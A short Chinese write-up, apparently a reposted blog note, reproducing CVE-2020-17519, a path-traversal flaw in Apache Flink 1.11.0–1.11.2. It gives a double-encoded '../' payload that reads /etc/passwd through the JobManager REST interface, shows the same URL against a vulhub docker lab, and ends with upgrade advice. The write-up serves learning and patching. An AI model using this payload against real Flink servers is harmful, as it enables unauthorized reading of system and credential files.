1.漏洞描述
Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。
Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
2.影响版本
- 1.11.0
- 1.11.1
- 1.11.2
3.POC
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd4.环境搭建
1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17519目录
docker-compose up-d
2)访问http://192.168.157.148:8081,环境搭建成功,如下图所示
5.漏洞复现
直接访问POC
http://192.168.157.148:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
6.修复建议
升级Flink 到1.11.3或1.12.0版本,下载链接为:
https://flink.apache.org/downloads.html
https://flink.apache.org/downloads.html
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
